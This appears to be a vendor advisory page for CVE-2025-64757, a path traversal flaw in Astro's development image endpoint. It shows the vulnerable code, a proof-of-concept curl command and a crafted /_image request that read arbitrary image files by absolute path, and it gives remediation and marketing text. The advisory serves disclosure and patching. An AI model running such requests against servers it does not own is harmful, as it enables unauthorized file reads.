CVE-2025-64757

CVE-2025-64757 is a low-severity path traversal vulnerability in astro (npm), affecting versions < 5.14.3. It is fixed in 5.14.3.

Summary

A vulnerability has been identified in the Astro framework's development server that allows arbitrary local file read access through the image optimization endpoint. The vulnerability affects Astro development environments and allows remote attackers to read any image file accessible to the Node.js process on the host system.

Details

  • Title: Arbitrary Local File Read in Astro Development Image Endpoint
  • Type: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
  • Component: /packages/astro/src/assets/endpoint/node.ts
  • Affected Versions: Astro v5.x development builds (confirmed v5.13.3)
  • Attack Vector: Network (HTTP GET request)
  • Authentication Required: None

The vulnerability exists in the Node.js image endpoint handler used during development mode. The endpoint accepts an href parameter that specifies the path to an image file. In development mode, this parameter is processed without adequate path validation, allowing attackers to specify absolute file paths.

Vulnerable Code Location: packages/astro/src/assets/endpoint/node.ts

// Vulnerable code in development mode
if (import.meta.env.DEV) {
    fileUrl = pathToFileURL(removeQueryString(replaceFileSystemReferences(src)));
} else {
    // Production has proper path validation
    // ... security checks omitted in dev mode
}

The development branch bypasses the security checks that exist in the production code path, which validates that file paths are within the allowed assets directory.

PoC

Attack Prerequisites

  1. Astro development server must be running (astro dev)
  2. The /_image endpoint must be accessible to the attacker
  3. Target image files must be readable by the Node.js process

Exploit Steps

  1. Start Astro Development Server:

    astro dev  # Typically runs on http://localhost:4321
    
  2. Craft Malicious Request:

    GET /_image?href=/[ABSOLUTE_PATH_TO_IMAGE]&w=100&h=100&f=png HTTP/1.1
    Host: localhost:4321
    
  3. Example Attack:

    curl "http://localhost:4321/_image?href=/%2FSystem%2FLibrary%2FImage%20Capture%2FAutomatic%20Tasks%2FMakePDF.app%2FContents%2FResources%2F0blank.jpg&w=100&h=100&f=png" -o stolen.png
    

Demonstration Results

Test Environment: macOS with Astro v5.13.3

Successful Exploitation:

  • Target: /System/Library/Image Capture/Automatic Tasks/MakePDF.app/Contents/Resources/0blank.jpg
  • Response: HTTP 200 OK, Content-Type: image/png
  • Exfiltration: 303 bytes (100x100 PNG)
  • File Created: stolen-image.png containing processed system image

Attack Payload:

http://localhost:4321/_image?href=/%2FSystem%2FLibrary%2FImage%20Capture%2FAutomatic%20Tasks%2FMakePDF.app%2FContents%2FResources%2F0blank.jpg&w=100&h=100&f=png

Server Response:

Status: 200 OK
Content-Type: image/png
Content-Length: 303

Confidentiality Impact: HIGH

  • Scope: Any image file readable by the Node.js process
  • Exfiltration Method: Complete file contents via HTTP response (transformed to PNG)

Integrity Impact: NONE

  • The vulnerability only allows reading files, not modification

Availability Impact: NONE

  • No direct impact on system availability
  • Potential for resource exhaustion through repeated large image requests

Affected Components

Primary Component

  • File: packages/astro/src/assets/endpoint/node.ts
  • Function: loadLocalImage()
  • Lines: Development mode branch (~25-35)

Secondary Components

  • File: packages/astro/src/assets/endpoint/generic.ts
  • Impact: Uses different code path, not directly vulnerable
  • Note: Implements proper remote allowlist validation

Impact

Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.

CVE-2025-64757 has a CVSS score of 3.5 (Low). The vector is reachable from an adjacent network, no privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (5.14.3); upgrading removes the vulnerable code path.

Affected versions

astro (< 5.14.3)

Security releases

astro → 5.14.3 (npm)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade astro to 5.14.3 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2025-64757? CVE-2025-64757 is a low-severity path traversal vulnerability in astro (npm), affecting versions < 5.14.3. It is fixed in 5.14.3. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
  2. How severe is CVE-2025-64757? CVE-2025-64757 has a CVSS score of 3.5 (Low). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of astro are affected by CVE-2025-64757? astro (npm) versions < 5.14.3 is affected.
  4. Is there a fix for CVE-2025-64757? Yes. CVE-2025-64757 is fixed in 5.14.3. Upgrade to this version or later.
  5. Is CVE-2025-64757 exploitable, and should I be worried? Whether CVE-2025-64757 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2025-64757 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2025-64757? Upgrade astro to 5.14.3 or later.

Other vulnerabilities in astro

CVE-2026-54298CVE-2026-54299CVE-2026-50146CVE-2026-45028CVE-2026-41067

Stop the waste.
Protect your environment with Kodem.